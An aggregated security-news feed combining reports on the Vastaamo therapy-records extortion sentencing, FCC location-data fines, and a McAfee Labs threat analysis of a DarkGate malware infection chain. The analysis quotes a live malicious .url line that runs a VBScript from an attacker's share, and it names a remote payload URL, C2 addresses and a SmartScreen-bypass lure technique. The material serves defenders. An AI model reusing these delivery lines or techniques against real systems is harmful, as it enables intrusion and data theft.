Updated The open source R programming language β popular among statisticians and data scientists for performing visualization, machine learning, and suchlike β has patched an arbitrary code execution hole that scored a preliminary CVSS severity rating of 8.8 out of 10.β¦
This tutorial gives an example showing how to fuzz a function out of a compiled binary using AFL's QEMU mode.
A cyber-thief who snatched tens of thousands of patients' sensitive records from a psychotherapy clinic before blackmailing them and then leaking their files online has been caged for six years and three months.β¦
Updated UnitedHealth CEO Andrew Witty will tell US lawmakers Wednesday the cybercriminals who hit Change Healthcare with ransomware used stolen credentials to remotely access a Citrix portal that didn't have multi-factor authentication enabled.β¦
A former NSA employee has been sentenced to 262 months in prison for attempting to freelance as a Russian spy.β¦
A 26-year-old Finnish man was sentenced to more than six years in prison today after being convicted of hacking into an online psychotherapy clinic, leaking tens of thousands of patient therapy records, and attempting to extort the clinic and patients.
On October 21, 2020, the Vastaamo Psychotherapy Center in Finland became the target of blackmail when a tormentor identified as βransom_manβ demanded payment of 40 bitcoins (~450,000 euros at the time) in return for a promise not to publish highly sensitive therapy session notes Vastaamo had exposed online.
Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours. When Vastaamo declined to pay, ransom_man shifted to extorting individual patients. According to Finnish police, some 22,000 victims reported extortion attempts targeting them personally, targeted emails that threatened to publish their therapy notes online unless paid a 500 euro ransom.
Finnish prosecutors quickly zeroed in on a suspect: Julius βZeekillβ KivimΓ€ki, a notorious criminal hacker convicted of committing tens of thousands of cybercrimes before he became an adult. After being charged with the attack in October 2022, KivimΓ€ki fled the country. He was arrested four months later in France, hiding out under an assumed name and passport.
Antti Kurittu is a former criminal investigator who worked on an investigation involving KivimΓ€kiβs use of the Zbot botnet, among other activities KivimΓ€ki engaged in as a member of the hacker groupΒ Hack the Planet (HTP).
Kurittu said the prosecution had demanded at least seven years in jail, and that the sentence handed down was six years and three months. Kurittu said prosecutors knocked a few months off of KivimΓ€kiβs sentence because he agreed to pay compensation to his victims, and that KivimΓ€ki will remain in prison during any appeal process.
βI think the sentencing was as expected, knowing the Finnish judicial system,β Kurittu told KrebsOnSecurity. βAs KivimΓ€ki has not been sentenced to a non-suspended prison sentence during the last five years, he will be treated as a first-timer, his previous convictions notwithstanding.β
But because juvenile convictions in Finland donβt count towards determining whether somebody is a first-time offender, KivimΓ€ki will end up serving approximately half of his sentence.
βThis seems like a short sentence when taking into account the gravity of his actions and the life-altering consequences to thousands of people, but itβs almost the maximum the law allows for,β Kurittu said.
KivimΓ€ki initially gained notoriety as a self-professed member of theΒ Lizard Squad, a mainly low-skilled hacker group that specialized in DDoS attacks. But American and Finnish investigators say KivimΓ€kiβs involvement in cybercrime dates back to at least 2008, when he was introduced to a founding member of what would soon become HTP.
Finnish police said KivimΓ€ki also used the nicknames βRyanβ, βRyanCβ and βRyan Clearyβ (Ryan Cleary was actually a member of a rival hacker group β LulzSecΒ β who was sentenced to prison for hacking).
KivimΓ€ki and other HTP members were involved in mass-compromising web servers using known vulnerabilities, and by 2012 KivimΓ€kiβs alias Ryan Cleary was selling access to those servers in the form of a DDoS-for-hire service. KivimΓ€ki was 15 years old at the time.
In 2013, investigators going through devices seized from KivimΓ€ki found computer code that had been used to crack more than 60,000 web servers using a previously unknown vulnerability inΒ Adobeβs ColdFusion software. KrebsOnSecurity detailed the work of HTP in September 2013, after the groupΒ compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.
The group used the same ColdFusion flawsΒ to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to theΒ U.S. Federal Bureau of InvestigationΒ (FBI).
As KrebsOnSecurity reported at the time, this small ColdFusion botnet of data broker servers was being controlled by the same cybercriminals whoβd assumed control over SSNDOB, which operated one of the undergroundβs most reliable services for obtaining Social Security Number, dates of birth and credit file information on U.S. residents.
KivimΓ€ki was responsible for making an August 2014 bomb threatΒ against formerΒ Sony Online Entertainment President John Smedley that grounded an American Airlines plane.Β KivimΓ€kiΒ also was involved in calling in multiple fake bomb threats and βswattingβ incidents β reporting fake hostage situations at an address to prompt a heavily armed police response to that location.
Ville Tapio, the former CEO of Vastaamo, was fired and also prosecuted following the breach. Ransom_man bragged about Vastaamoβs sloppy security, noting the company had used the laughably weak username and password βroot/rootβ to protect sensitive patient records.
Investigators later found Vastaamo had originally been hacked in 2018 and again in 2019. In April 2023, a Finnish court handed down a three-month sentence for Tapio, but that sentence was suspended because he had no previous criminal record.
The European Commission has launched formal proceedings against Meta, alleging failure to properly monitor distribution by "foreign actors" of political misinformation before June's European elections.β¦
Apple's grudging accommodation of European antitrust rules by allowing third-party app stores on iPhones has left users of its Safari browser exposed to potential web activity tracking.β¦
The FCC on Monday fined four major US telcos almost $200 million for "illegally" selling subscribers' location information to data brokers.β¦
Google says it stopped 2.28 million Android apps from being published in its official Play Store last year because they violated security rules.β¦
The U.S. Federal Communications Commission (FCC) today levied fines totaling nearly $200 million against the four major carriers β including AT&T, Sprint, T-Mobile and Verizon β for illegally sharing access to customersβ location information without consent.
The fines mark the culmination of a more than four-year investigation into the actions of the major carriers. In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.
The FCC said it found the carriers each sold access to its customersβ location information to βaggregators,β who then resold access to the information to third-party location-based service providers.
βIn doing so, each carrier attempted to offload its obligations to obtain customer consent onto downstream recipients of location information, which in many instances meant that no valid customer consent was obtained,β an FCC statement on the action reads. βThis initial failure was compounded when, after becoming aware that their safeguards were ineffective, the carriers continued to sell access to location information without taking reasonable measures to protect it from unauthorized access.β
The FCCβs findings against AT&T, for example, show that AT&T sold customer location data directly or indirectly to at least 88 third-party entities. The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities. Location data for Sprint customers found its way to 86 third-party entities, and to 75 third-parties in the case of T-Mobile customers.
The commission said it took action after Sen. Ron Wyden (D-Ore.) sent a letter to the FCC detailing how a company called Securus TechnologiesΒ had been selling location data on customers of virtually any major mobile provider to law enforcement officials.
That same month, KrebsOnSecurityΒ broke the newsΒ thatΒ LocationSmartΒ β a data aggregation firm working with the major wireless carriers β had a free, unsecured demo of its service online that anyone could abuse to find the near-exact location of virtually any mobile phone in North America.
The carriers promised to βwind downβ location data sharing agreements with third-party companies. But in 2019, reporting at Vice.com showed that little had changed, detailing how reporters were able to locate a test phone after paying $300 to a bounty hunter who simply bought the data through a little-known third-party service.
Sen. Wyden said no one who signed up for a cell plan thought they were giving permission for their phone company to sell a detailed record of their movements to anyone with a credit card.
βI applaud the FCC for following through on my investigation and holding these companies accountable for putting customersβ lives and privacy at risk,β Wyden said in a statement today.
The FCC fined Sprint and T-Mobile $12 million and $80 million respectively. AT&T was fined more than $57 million, while Verizon received a $47 million penalty. Still, these fines represent a tiny fraction of each carrierβs annual revenues. For example, $47 million is less than one percent of Verizonβs total wireless service revenue in 2023, which was nearly $77 billion.
The fine amounts vary because they were calculated based in part on the number of days that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements). The FCC notes that AT&T and Verizon each took more than 320 days from the publication of the Times story to wind down their data sharing agreements; T-Mobile took 275 days; Sprint kept sharing customer location data for 386 days.
Update, 6:25 p.m. ET: Clarified that the FCC launched its investigation at the request of Sen. Wyden.
Updated Canadian pharmacy chain London Drugs closed all of its stores over the weekend until further notice following a "cybersecurity incident."β¦
Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena
McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:
Figure 1: Geo-Distribution of DarkGate
Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.
In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is about βInternet Shortcut Files Security Feature Bypass Vulnerabilityβ.
McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:
Figure 2: Infection Chain
The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in βCloud Viewβ (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.
Figure 3: HTML page
Upon clicking βCloud View,β users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.
Figure 4: Prompt confirming redirection to Windows Explorer
Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays β\\onedrive.live.com,β adding a veneer of legitimacy to the purported βCloud Viewβ experience.
Figure 5: Share Internet Shortcut via SMB
In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.
Figure 6: Javascript in HTML code
On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:
Figure 7: WebDAV share
The URL utilizes the βsearch-msβ application protocol to execute a search operation for a file named βReport-26-2024.urlβ. The βcrumbβ parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the βDisplayNameβ element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate βonedrive.live.comβ folder, thereby facilitating deception.
Hence, the presence of βonedrive.live.comβ in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.
The file is an Internet Shortcut (.url) file, containing the following content:
Figure 8: content of .URL file
The .url files serve as straightforward INI configuration files, typically consisting of a βURL=β parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.
Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.
The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.
If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:
Figure 9: SmartScreen prompt
On allowing execution, the vbs file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:
Figure 10: Process tree
Following are the command lines:
The sequence of commands begins with the execution of the VBScript file located at βC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbsβ. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (βwithupdate.com/zuyagaoqβ) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).
Inspecting the URL βwithupdate.com/zuyagaoqβ explicitly allows for a detailed understanding of the infection flow:
Figure 11: Remote Script on the C2
This URL leads to a script:
Figure 13: Remote script content
Explanation of the script:
Checking βC:/rjtuβ:
Figure 14: Dropped folder
AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.
To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).
Following is the ahk script file content:
Figure 15: Content of .ahk script
There are a lot of comments added in the script, simplifying the script, we get:
Figure 16: .ahk script after removing junk
This script reads the content of βtest.txtβ into memory, allocates a memory region in the processβs address space, writes the content of βtest.txtβ as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in βtest.txtβ.
Now, itβs confirmed that the shellcode resides within the contents of βtest.txtβ. This is how the text.txt appears:
Figure 17: Content of test.txt
We analyzed the memory in use for Autohotkey.exe.
Figure 19: Memory dump of running AutoHotKey.exe same as test.txt
This is the shellcode present here. Β The first 6 bytes are assembly instructions:
Following the jump instructions of 3bf bytes, we reach the same set of instructions again:
Figure 21: Same Shellcode A after jump
This means another jump with be taken for another 3bf bytes:
Figure 22: Same Shellcode A one more time
We have encountered same set of instructions again, taking another jump we reach to:
Figure 23: New Shellcode B found next.
These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.
Figure 24: Shellcode B followed by PE file highlighted
This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:
Figure 25: After debugging found next Shellcode C
This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.
Figure 26: Shellcode C directing to entry point of the PE file
Upon debugging this code, we figured out that in marked βcall eaxβ instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.
This is the final DarkGate payload which is a Delphi-compiled executable file:
Figure 27: Darkgate payload.
Upon this, we see all the network activity happening to C2 site:
Figure 28: Network Communication
Figure 29: C2 IP address
The exfiltration is done to the IP address 5.252.177.207.
Persistence:
For maintaining persistence, a .lnk file is dropped in startup folder:
Figure 30: Persistence
Content of lnk file:
Figure 31: Content of .lnk used for persistence
The shortcut file (lnk) drops a folder named βhakeedeβ in the βC:\ProgramDataβ directory.
Figure 32: Folder dropped in βC:\ProgramDataβ
Inside this folder, all the same files are present:
Figure 33: Same set of files present in dropped folder
Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.
Infection from XLS:
The malicious excel file asks the user to click on βOpenβ to view the content properly.
Figure 34: XLS sample
Upon clicking on βOpenβ button, user gets the following prompt warning the user before opening the file.
Figure 35: XLS files trying to download and run VBS file
For our analysis, we allowed the activity by clicking on βOKβ. Following this we got the process tree as:
Figure 36: Process tree from Excel file
The command lines are:
The file it gets from β103.124.106[.]237/wctaehcwβ has the following content:
Figure 37: Remote script simliar to previous chain
From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.
Mitigation:
Indicators of Compromise (IoCs):
File | Hash |
Html file | 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005 |
URL file | 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833 |
VBS | 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907 |
autohotkey.exe | 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb |
AHK script | dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455 |
test.txt | 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795 |
DarkGate exe | 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031 |
IP | 5.252.177.207 |
XLS file | 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4 |
VBS | 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f |
LNK file | 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e |
IP | 103.124.106.237 |
Table 1: IOC table
The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.
The French government has tabled an offer to buy key assets of ailing IT giant Atos after the company late last week almost doubled its estimate of the cash it will need to stay afloat in the near future.β¦
Smart device manufacturers will have to play by new rules in the UK as of today, with laws coming into force to make it more difficult for cybercriminals to break into hardware such as phones and tablets.β¦
The UK Competition and Markets Authority (CMA) still has privacy and competition concerns about Google's Privacy Sandbox advertising toolkit, which explains why the ad giant recently again delayed its plan to drop third-party cookies in Chrome until 2025.β¦
Sponsored Feature As business enters the 2020s, organizations find themselves protecting fast-expanding digital estates using security concepts that are decades old.β¦